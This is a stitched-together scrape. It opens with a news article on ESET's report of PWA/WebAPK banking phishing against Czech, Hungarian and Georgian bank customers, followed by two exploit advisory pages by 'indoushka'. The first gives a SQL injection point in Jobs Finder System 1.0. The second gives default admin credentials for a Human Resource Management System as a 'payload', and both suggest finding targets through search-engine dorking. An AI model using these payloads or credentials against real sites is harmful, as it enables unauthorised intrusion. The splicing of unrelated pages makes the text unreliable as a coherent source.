The attacks have targeted the Czech-based Československá obchodní banka (CSOB), as well as the Hungarian OTP Bank and the Georgian TBC Bank, according to Slovak cybersecurity company ESET.

"The phishing websites targeting iOS instruct victims to add a Progressive Web Application (PWA) to their home-screens, while on Android the PWA is installed after confirming custom pop-ups in the browser," security researcher Jakub Osmani said.

"At this point, on both operating systems, these phishing apps are largely indistinguishable from the real banking apps that they mimic."

What's notable about this tactic is that users are deceived into installing a PWA, or even WebAPKs in some cases on Android, from a third-party site without having to specifically allow side loading.

An analysis of the command-and-control (C2) servers used and the backend infrastructure reveals that two different threat actors are behind the campaigns.

These websites are distributed via automated voice calls, SMS messages, and social media malvertising via Facebook and Instagram. The voice calls warn users about an out-of-date banking app and ask them to select a numerical option, following which the phishing URL is sent.

Users who end up clicking on the link are displayed a lookalike page that mimics the Google Play Store listing for the targeted banking app, or a copycat site for the application, ultimately leading to the "installation" of the PWA or WebAPK app under the guise of an app update.

"This crucial installation step bypasses traditional browser warnings of 'installing unknown apps': this is the default behavior of Chrome's WebAPK technology, which is abused by the attackers," Osmani explained. "Furthermore, installing a WebAPK does not produce any of the 'installation from an untrusted source' warnings."

For those who are on Apple iOS devices, instructions are provided to add the bogus PWA app to the Home Screen. The end goal of the campaign is to capture the banking credentials entered on the app and exfiltrate them to an attacker-controlled C2 server or a Telegram group chat.

ESET said it recorded the first phishing-via-PWA instance in early November 2023, with subsequent waves detected in March and May 2024.

The disclosure comes as cybersecurity researchers have uncovered a new variant of the Gigabud Android trojan that's spread via phishing websites mimicking the Google Play Store or sites impersonating various banks or governmental entities.

"The malware has various capabilities such as the collection of data about the infected device, exfiltration of banking credentials, collection of screen recordings, etc.," Broadcom-owned Symantec said.

It also follows Silent Push's discovery of 24 different control panels for a variety of Android banking trojans such as ERMAC, BlackRock, Hook, Loot, and Pegasus (not to be confused with NSO Group's spyware of the same name) that are operated by a threat actor named DukeEugene.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Czech Mobile Users Targeted in New Banking Credential Theft Scheme

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Tag

#ios